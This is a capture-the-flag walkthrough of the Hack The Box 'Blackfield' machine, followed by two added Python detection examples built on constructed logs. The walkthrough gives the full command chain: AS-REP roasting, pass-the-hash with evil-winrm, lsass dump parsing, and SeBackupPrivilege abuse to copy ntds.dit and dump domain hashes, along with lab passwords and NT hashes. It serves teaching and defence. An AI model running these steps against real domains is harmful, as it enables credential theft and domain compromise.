Blackfield | Machine HTB Writeup

Repl

Just a quick PoC, without images. These are my old notes that I want to share, but I can't import the images, I don't know why. Just enjoy the short writeup for Blackfield on HTB.

User

Enumeration

For port scanning I'm using naabu with its built-in nmap-cli option:

scan_port () {
    # full TCP port sweep with naabu, handing the open ports to nmap for service detection
    naabu --host "$1" -v -p - -nmap-cli 'nmap -sV -Pn' -o "$1-opened.port"
}

After we know SMB is open (445) we enumerate it using nxc (test with smbclient first to see if we can view anything useful: smbclient -L $target).

We know we have permission on the profiles$ share, so I mount it to /mnt/Blackfield:

sudo mount -t cifs //10.129.229.17/profiles$ /mnt/Blackfield

After that we have a folder for each 'username', so I pipe the listing and save it as user.txt:

ls /mnt/Blackfield > user.txt

Exploitation

After that we check whether these users are valid or not (we know Kerberos is open, so we can perform https://www.netexec.wiki/ldap-protocol/asreproast).

And we found a hash. Put it directly into hashcat.

And we got the password:

user : support@BLACKFIELD.LOCAL pass : #00^BlackKnight
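Defender-side view of the AS-REP roasting step, as an added example that is not from the original writeup: the userAccountControl export and the Event 4768 records below are constructed, not taken from the box, and the field names follow the Windows Security log XML for event 4768.

```python
# Added example, not from the original writeup. Two checks a defender would run
# against the AS-REP roasting step: which accounts are roastable at all, and
# which 4768 events show a crackable AS-REP being handed out. All data is constructed.
DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit: Kerberos pre-auth not required

# Constructed LDAP export: sAMAccountName -> userAccountControl
UAC_EXPORT = {
    "support": 0x410200,     # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
    "audit2020": 0x10200,    # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    "svc_backup": 0x10200,
}

# Constructed Security log records (Event 4768, "A Kerberos authentication
# ticket (TGT) was requested"); keys match the event's XML data names.
EVENTS = [
    {"EventID": 4768, "TargetUserName": "support", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "audit2020", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.129.229.50"},
    # pre-auth skipped but an AES ticket was issued: not the roast signature
    {"EventID": 4768, "TargetUserName": "support", "PreAuthType": "0",
     "TicketEncryptionType": "0x12", "IpAddress": "10.129.229.50"},
]


def roastable_accounts(uac_export):
    """Accounts with DONT_REQ_PREAUTH set: the condition that lets anyone who
    knows the username obtain an AS-REP without proving the password first."""
    return sorted(n for n, uac in uac_export.items() if uac & DONT_REQ_PREAUTH)


def asrep_roast_events(events):
    """4768 with Pre-Authentication Type 0 and an RC4 (0x17) ticket is the
    signature the asreproast step above leaves; return (user, source IP)."""
    return [
        (ev["TargetUserName"], ev["IpAddress"])
        for ev in events
        if ev["EventID"] == 4768
        and ev["PreAuthType"] == "0"
        and ev["TicketEncryptionType"] == "0x17"
    ]
```

The fix on the directory side is to clear the flag on `support` (it only exists for legacy clients), which makes the first function return an empty list and the second one stop firing.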

But we are still not able to use this account with WinRM, so we enumerate more in SMB using these creds:

https://www.netexec.wiki/smb-protocol/enumeration/enumerate-domain-users

And we found a bunch of users. We ran the Kerberos pre-authentication brute force again for that bunch of users, but nothing useful came out of it, so we ran BloodHound:

bloodhound-python -u support -p  '#00^BlackKnight' -d blackfield.local -ns $TARGET -c all

$TARGET is the IP. Then we mark the user we own (support) and find the shortest paths from it to the rest of these users:

head -10 domain_user.txt
Administrator
Guest
krbtgt
audit2020
support
BLACKFIELD764430
BLACKFIELD538365
BLACKFIELD189208
BLACKFIELD404458
BLACKFIELD706381

Yep, and we have the privilege to force a password change on audit2020.

Yep, we successfully owned audit2020, and now we have access to the forensic SMB share.

In the folder memory_analysis we have lsass.zip, a dump of lsass (this can be used for memory forensics to get user creds from the Windows machine itself):

pypykatz lsa minidump lsass.DMP

Don't forget to extract it first. We got this:

Username: svc_backup
NT: 9658d1d1dcd9250115e2205d9f48400d

Username: Administrator
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

Yep, and we can log in using svc_backup. The Administrator hash seems to fail, but with svc_backup we can use WinRM:

nxc winrm 10.129.229.17  -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

evil-winrm -i 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Go to the Desktop and obtain the user flag.

Root

Enumeration

First we check our privileges using the `whoami /all` command.

And we can see we have SeBackupPrivilege. According to this article we can escalate privileges with it: https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-sebackupprivilege/

Exploitation

Create a diskshadow script to execute:

set context persistent nowriters#
add volume c: alias replican#
create#
expose %replican% x:#

Make sure you put it on the target first.

Then run it:

diskshadow.exe /s diskshadow.txt

Then, following this article https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-sebackupprivilege/, we do this:

upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege x:\windows\ntds\ntds.dit c:\temp\ntds.dit -overwrite

Then we download ntds.dit.

Don't forget to also save the SYSTEM hive so it can be downloaded:

reg save HKLM\SYSTEM hivsystem

Then in evil-winrm just:

download ntds.dit
download hivsystem

And we got it:

➜ secretsdump.py -ntds ntds.dit -system system.hive LOCAL
Impacket v0.12.0.dev1+20240516.104846.5bccf8dc - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
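Detection side of the SeBackupPrivilege chain above (diskshadow script, ntds.dit copy, SYSTEM hive save), as an added example that is not from the original writeup: the command-line records are constructed, and in practice they would come from process-creation auditing (Event 4688 with command-line logging) or PowerShell script block logging (Event 4104).

```python
import re

# Added example, not from the original writeup. Flags the three commands the
# SeBackupPrivilege chain above runs and correlates them per account, so a
# single legitimate hive backup does not alert but the full chain does.
INDICATORS = {
    "diskshadow_script": re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I),
    "system_hive_save": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(system|sam|security)\b", re.I),
    "ntds_dit_access": re.compile(r"\\windows\\ntds\\ntds\.dit\b", re.I),
}

# Constructed command-line telemetry: (epoch seconds, account, command line).
# Real sources: Event 4688 with command-line auditing, or Event 4104 script text.
RECORDS = [
    (1000, "svc_backup", r"diskshadow.exe /s C:\temp\diskshadow.txt"),
    (1060, "svc_backup", r"reg save HKLM\SYSTEM hivsystem"),
    (1090, "svc_backup", r"Copy-FileSeBackupPrivilege x:\windows\ntds\ntds.dit c:\temp\ntds.dit -overwrite"),
    (5000, "backupsvc", r"wbadmin start backup -backupTarget:E: -include:C:"),
    (9000, "helpdesk", r"reg save HKLM\SOFTWARE\Contoso app.hiv"),
]


def classify(cmdline):
    """Return the indicator names whose pattern matches this command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def correlate(records, window=600):
    """Per account, look for two or more distinct indicators within `window`
    seconds of each other; return {account: sorted indicator names}."""
    per_user = {}
    for ts, user, cmd in records:
        for tag in classify(cmd):
            per_user.setdefault(user, []).append((ts, tag))
    alerts = {}
    for user, hits in per_user.items():
        hits.sort()
        for start, _ in hits:
            tags = {tag for ts, tag in hits if start <= ts <= start + window}
            if len(tags) >= 2:
                alerts[user] = sorted(tags)
                break
    return alerts
```

Membership in Backup Operators is what grants SeBackupPrivilege in the first place, so the same review should check who holds that group and whether an account such as svc_backup needs it.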

And we obtain root.

Written by Repl